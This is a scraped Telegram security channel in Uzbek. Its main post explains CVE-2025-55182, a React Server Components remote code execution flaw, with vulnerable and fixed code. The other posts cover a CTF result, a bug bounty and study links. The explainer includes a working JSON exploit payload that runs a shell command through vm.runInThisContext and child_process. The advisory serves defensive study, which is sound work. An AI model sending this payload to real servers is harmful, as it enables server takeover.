🚨 CVE-2025-55182 - React Server Components RCE
CVSS Score: 10.0/10 (Maximum xavflilik)
Qaysi versiyalar vulnerable?
React Server Actions serialize qilayotganda hasOwnProperty check qilmaydi. Natijada prototype chain orqali kirib, server'da istalgan code run qilish mumkin.
Vulnerable code:
Prototype chain muammosi:
Exploit qanday ishlaydi?
Attacker shunday payload yuboradi:
Server bu request'ni qabul qilgach:
Fixed code:
CVSS Score: 10.0/10 (Maximum xavflilik)
Qaysi versiyalar vulnerable?
React 19.0.0 - 19.2.0
Next.js 15.x va 16.x (App Router)
Server Components ishlatadigan barcha loyihalar
React Server Actions serialize qilayotganda hasOwnProperty check qilmaydi. Natijada prototype chain orqali kirib, server'da istalgan code run qilish mumkin.
Vulnerable code:
function requireModule(metadata) {
const moduleExports = require(metadata[0]);
return moduleExports[metadata[2]]; // prototype chain ga kiradi
}Prototype chain muammosi:
const vm = require('vm');
vm.hasOwnProperty('runInThisContext'); // false
vm['runInThisContext']; // lekin accessible! ❌Exploit qanday ishlaydi?
Attacker shunday payload yuboradi:
{
"$ACTION_REF_0": "",
"$ACTION_0:0": {
"id": "vm#runInThisContext",
"bound": ["require('child_process').execSync('whoami').toString()"]
}
}Server bu request'ni qabul qilgach:
1.vm module'ni load qiladi
2.vm['runInThisContext'] prototype orqali olinadi
3.Attacker'ning code'i argument sifatida bind .bo'ladi
4.Execute bo'lganda vm.runInThisContext() malicious code'ni ishga tushiradi
5.RCE achieved - server butunlay compromised
Fixed code:
function requireModule(metadata) {
const moduleExports = require(metadata[0]);
if (!hasOwnProperty.call(moduleExports, metadata[2])) {
throw new Error('Export not found');
}
return moduleExports[metadata[2]];
}❤1
JavaSec
🚨 CVE-2025-55182 - React Server Components RCE CVSS Score: 10.0/10 (Maximum xavflilik) Qaysi versiyalar vulnerable? React 19.0.0 - 19.2.0 Next.js 15.x va 16.x (App Router) Server Components ishlatadigan barcha loyihalar React Server Actions serialize qilayotganda…
image_2025-12-04_10-47-39.png
442.7 KB
❤1
Forwarded from Turan Security
🏆 BlackHat MEA 2025 CTF musobaqasida 12-o'rin!
Turan Security va O'zbekiston shahafini himoya qilgan jamoa dunyoning eng nufuzli kiberxavfsizlik musobaqalaridan birida 125 jamoa orasidan TOP-12 talikdan joy oldi!
Saudiya Arabistoning Ar-Riyod shahrida o‘tkazilgan BlackHat MEA tadbiri - global miqyosdagi eng kuchli mutaxassislar, ekspertlar va jahonning yetakchi kiberxavfsizlik jamoalari uchrashadigan maydon.
TOP jamoalar orasida Team lead’imiz qiyinlik darajasi yuqori bo'lgan 3 ta taskda:
Bizning maqsadimiz xalqaro maydonda O‘zbekistonni nufuzini oshirish, yoshlarga ilhom berish va kiberxavfsizlik sohasini rivojlantirish.
Turan Security va O'zbekiston shahafini himoya qilgan jamoa dunyoning eng nufuzli kiberxavfsizlik musobaqalaridan birida 125 jamoa orasidan TOP-12 talikdan joy oldi!
Saudiya Arabistoning Ar-Riyod shahrida o‘tkazilgan BlackHat MEA tadbiri - global miqyosdagi eng kuchli mutaxassislar, ekspertlar va jahonning yetakchi kiberxavfsizlik jamoalari uchrashadigan maydon.
TOP jamoalar orasida Team lead’imiz qiyinlik darajasi yuqori bo'lgan 3 ta taskda:
🚩Firstblood - web, birinchi;
🚩Firstblood - forensics, birinchi;
🚩Secondblood - web, ikkinchi bo'lib flagni aniqlashga erishdi.
Bizning maqsadimiz xalqaro maydonda O‘zbekistonni nufuzini oshirish, yoshlarga ilhom berish va kiberxavfsizlik sohasini rivojlantirish.
1🔥7❤2🤝1
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥12❤🔥3🕊1
JavaSec
Why mid-January🤔
Nvidia also hacked 😎
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5🤡3🕊2
CPTS (HTB) o'rganayotganlar uchun aloxida notelar
https://github.com/sachinn403/PentestCodeX/tree/main/courses/cpts-main
https://github.com/sachinn403/PentestCodeX/tree/main/courses/cpts-main
GitHub
PentestCodeX/courses/cpts-main at main · sachinn403/PentestCodeX
Notes. Contribute to sachinn403/PentestCodeX development by creating an account on GitHub.
👏7❤1👍1
3 ta zero-day va uchunchi 0day zaifligi accepted va 👀000💲 bounty!
1-zero-day zaifligi uchun reject olganimda menimcha Zero Day Initiativedan accepted olishni iloji yoq deb oylagan edim
Demak iloji bor…
1-zero-day zaifligi uchun reject olganimda menimcha Zero Day Initiativedan accepted olishni iloji yoq deb oylagan edim
Zero Day Initiative (ZDI) — Trend Micro tomonidan yuritiladigan, dunyodagi eng yirik va nufuzli vulnerability research dasturlaridan biri. Ushbu dastur mustaqil xavfsizlik tadqiqotchilari (researcherlar) tomonidan topilgan zero-day va kritik zaifliklarni sotib oladi, ularni ishlab chiqaruvchi (vendor) bilan hamkorlikda yopilishini ta’minlaydi va foydalanuvchilar xavfsizligini oshiradi.
Shu dastur orqali topgan zaifligim ZDI laboratoriyasida to‘liq tekshirilib, tasdiqlandi va rasmiy ravishda qabul qilindi. Natijada bounty oldim va ZDI researcher sifatida tan olindim.
Demak iloji bor…
2❤9🔥6👍1🕊1
JavaSec
3 ta zero-day va uchunchi 0day zaifligi accepted va 👀000💲 bounty! 1-zero-day zaifligi uchun reject olganimda menimcha Zero Day Initiativedan accepted olishni iloji yoq deb oylagan edim Zero Day Initiative (ZDI) — Trend Micro tomonidan yuritiladigan, dunyodagi…
Nasb barchasi public bo’lganda video yoki post qilamiz POC bilan, qayerdan va qanday zaifligi haqida ham gaplashamiz.Foydali bo’ladi albatta
❤9👍4
JavaSec
https://www.youtube.com/playlist?list=PLM2v9hi8OtOVahKxVcnQcxDTvZgVY6E2g
old but gold
For OSWE prep
For OSWE prep
🔥3🕊1